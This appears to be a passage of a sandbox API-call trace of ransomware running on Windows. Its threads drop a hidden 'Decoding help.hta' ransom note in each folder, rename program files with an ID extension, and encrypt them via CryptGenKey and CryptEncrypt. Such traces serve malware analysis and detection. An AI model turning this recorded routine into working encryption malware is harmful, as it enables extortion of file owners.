lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta" [0058.493] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\Decoding help.hta" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\decoding help.hta")) returned 0x1 [0058.493] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Decoding help.hta") returned 0 [0058.493] FindNextFileW (in: hFindFile=0x5e2b30, lpFindFileData=0x2308fd30 | out: lpFindFileData=0x2308fd30*(dwFileAttributes=0x1, ftCreationTime.dwLowDateTime=0x22782210, ftCreationTime.dwHighDateTime=0x1d526b8, ftLastAccessTime.dwLowDateTime=0x22782210, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x22782210, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x78e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Decoding help.hta", cAlternateFileName="DECODI~1.HTA")) returned 0 [0058.493] FindClose (in: hFindFile=0x5e2b30 | out: hFindFile=0x5e2b30) returned 1 Thread: id = 520 os_tid = 0xc64 [0047.455] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\*.*", lpFindFileData=0x231cfd30 | out: lpFindFileData=0x231cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60c6f7f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60c6f7f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e27f0 [0049.322] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.322] FindNextFileW (in: hFindFile=0x5e27f0, lpFindFileData=0x231cfd30 | out: lpFindFileData=0x231cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x60c6f7f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x60c6f7f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.322] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.322] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.322] FindNextFileW (in: hFindFile=0x5e27f0, lpFindFileData=0x231cfd30 | out: lpFindFileData=0x231cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67cf6a00, ftCreationTime.dwHighDateTime=0x1c9c57d, ftLastAccessTime.dwLowDateTime=0x60c6f7f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x67cf6a00, ftLastWriteTime.dwHighDateTime=0x1c9c57d, nFileSizeHigh=0x0, nFileSizeLow=0x38770, dwReserved0=0x0, dwReserved1=0x0, cFileName="FeedSync.dll", cAlternateFileName="")) returned 1 [0049.654] lstrcpyW (in: lpString1=0x10d26a80, lpString2="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\*.*" [0049.654] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\*.*") returned 66 [0049.654] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\Decoding help.hta" [0049.654] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\Decoding help.hta" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\decoding help.hta")) returned 0xffffffff [0049.654] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\Decoding help.hta" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0051.680] WriteFile (in: hFile=0x32c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x231cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x231cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0052.700] CloseHandle (hObject=0x32c) returned 1 [0053.677] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.425] lstrcmpiW (lpString1="Decoding help.hta", lpString2="FeedSync.dll") returned -1 [0058.425] lstrlenW (lpString="FeedSync.dll") returned 12 [0058.425] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\*.*" [0058.425] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\*.*") returned 66 [0058.425] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\", lpString2="FeedSync.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\FeedSync.dll") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\FeedSync.dll" [0058.425] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\FeedSync.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\FeedSync.dll") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\FeedSync.dll" [0058.425] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\FeedSync.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\FeedSync.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\FeedSync.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\FeedSync.dll" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\feedsync.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\FeedSync.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\feedsync.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.610] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Runtime\\x64\\FeedSync.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\microsoft sync framework\\v1.0\\runtime\\x64\\feedsync.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x8c0 [0061.610] CreateFileMappingA (hFile=0x8c0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x88c [0061.610] CryptAcquireContextA (phProv=0x231cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 521 os_tid = 0xc68 [0047.477] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\*.*", lpFindFileData=0x2330fd30 | out: lpFindFileData=0x2330fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e3070 [0049.322] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.322] FindNextFileW (in: hFindFile=0x5e3070, lpFindFileData=0x2330fd30 | out: lpFindFileData=0x2330fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.323] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.323] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.323] FindNextFileW (in: hFindFile=0x5e3070, lpFindFileData=0x2330fd30 | out: lpFindFileData=0x2330fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="License Agreements", cAlternateFileName="LICENS~1")) returned 1 [0049.323] lstrcmpW (lpString1=".", lpString2="License Agreements") returned -1 [0049.323] lstrcmpW (lpString1="..", lpString2="License Agreements") returned -1 [0049.323] lstrcmpiW (lpString1="windows", lpString2="License Agreements") returned 1 [0049.655] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\*.*" [0049.655] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\*.*") returned 73 [0049.655] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\", lpString2="License Agreements" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements" [0049.655] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\*.*") returned="\\\\?\\C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\1033\\License Agreements\\*.*" [0049.656] GlobalMemoryStatus (in: lpBuffer=0x2330fd10 | out: lpBuffer=0x2330fd10) [0049.656] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x99a2cc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x38c [0049.658] CloseHandle (hObject=0x38c) returned 1 [0049.658] FindNextFileW (in: hFindFile=0x5e3070, lpFindFileData=0x2330fd30 | out: lpFindFileData=0x2330fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="License Agreements", cAlternateFileName="LICENS~1")) returned 0 [0049.658] FindClose (in: hFindFile=0x5e3070 | out: hFindFile=0x5e3070) returned 1 Thread: id = 522 os_tid = 0xc6c [0047.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*", lpFindFileData=0x2344fd30 | out: lpFindFileData=0x2344fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51494530, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2d30 [0049.998] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.998] FindNextFileW (in: hFindFile=0x5e2d30, lpFindFileData=0x2344fd30 | out: lpFindFileData=0x2344fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x51494530, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5edefe10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5edefe10, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.998] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.998] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.998] FindNextFileW (in: hFindFile=0x5e2d30, lpFindFileData=0x2344fd30 | out: lpFindFileData=0x2344fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x5ed7d9f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x4360, dwReserved0=0x0, dwReserved1=0x0, cFileName="as80.xsl", cAlternateFileName="")) returned 1 [0050.247] lstrcpyW (in: lpString1=0x11027670, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*" [0050.247] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*") returned 81 [0050.247] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Decoding help.hta" [0050.247] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\decoding help.hta")) returned 0xffffffff [0050.247] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0054.028] WriteFile (in: hFile=0x334, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2344fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2344fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0056.110] CloseHandle (hObject=0x334) returned 1 [0056.110] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0056.110] lstrcmpiW (lpString1="Decoding help.hta", lpString2="as80.xsl") returned 1 [0056.110] lstrlenW (lpString="as80.xsl") returned 8 [0056.110] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*" [0056.110] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*") returned 81 [0056.110] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", lpString2="as80.xsl" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" [0056.110] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" [0056.111] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.[ID]g9uZrLhJaygpwRm1[ID]" [0056.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0056.264] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x888 [0056.264] CreateFileMappingA (hFile=0x888, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x88c [0056.264] CryptAcquireContextA (in: phProv=0x2344fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2344fcec*=0x344a3d0) returned 1 [0059.826] CryptGenKey (in: hProv=0x344a3d0, Algid=0x6610, dwFlags=0x1, phKey=0x2344fce8 | out: phKey=0x2344fce8*=0x5d8890) returned 1 [0059.826] CryptExportKey (in: hKey=0x5d8890, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2344fbe4, pdwDataLen=0x2344fce4 | out: pbData=0x2344fbe4*, pdwDataLen=0x2344fce4*=0x2c) returned 1 [0059.826] MapViewOfFile (hFileMappingObject=0x88c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4360) returned 0x530000 [0059.848] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2344fbe4*, pdwDataLen=0x2344fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2344fbe4*, pdwDataLen=0x2344fcf8*=0x100) returned 1 [0059.849] CryptEncrypt (in: hKey=0x5d8890, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000, pdwDataLen=0x2344fce4*=0x4360, dwBufLen=0x4360 | out: pbData=0x530000*, pdwDataLen=0x2344fce4*=0x4360) returned 1 [0059.849] UnmapViewOfFile (lpBaseAddress=0x530000) returned 1 [0059.852] CloseHandle (hObject=0x88c) returned 1 [0059.852] CryptDestroyKey (hKey=0x5d8890) returned 1 [0059.852] CryptReleaseContext (hProv=0x344a3d0, dwFlags=0x0) returned 1 [0059.852] SetFilePointerEx (in: hFile=0x888, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.852] WriteFile (in: hFile=0x888, lpBuffer=0x2344fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2344fcf8, lpOverlapped=0x0 | out: lpBuffer=0x2344fbe4*, lpNumberOfBytesWritten=0x2344fcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.290] WriteFile (in: hFile=0x888, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2344fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x2344fcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.290] CloseHandle (hObject=0x888) returned 1 [0061.290] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.290] FindNextFileW (in: hFindFile=0x5e2d30, lpFindFileData=0x2344fd30 | out: lpFindFileData=0x2344fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ce7000, ftCreationTime.dwHighDateTime=0x1c9b00b, ftLastAccessTime.dwLowDateTime=0x51494530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa8ce7000, ftLastWriteTime.dwHighDateTime=0x1c9b00b, nFileSizeHigh=0x0, nFileSizeLow=0x4932, dwReserved0=0x0, dwReserved1=0x0, cFileName="as90.xsl", cAlternateFileName="")) returned 1 [0061.290] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*" [0061.290] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*") returned 81 [0061.290] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Decoding help.hta" [0061.290] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Decoding help.hta" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\decoding help.hta")) returned 0x1 [0061.290] lstrcmpiW (lpString1="Decoding help.hta", lpString2="as90.xsl") returned 1 [0061.290] lstrlenW (lpString="as90.xsl") returned 8 [0061.290] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*" [0061.291] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\*.*") returned 81 [0061.291] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\", lpString2="as90.xsl" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" [0061.291] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" [0061.291] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.[ID]g9uZrLhJaygpwRm1[ID]" [0061.291] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.291] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: 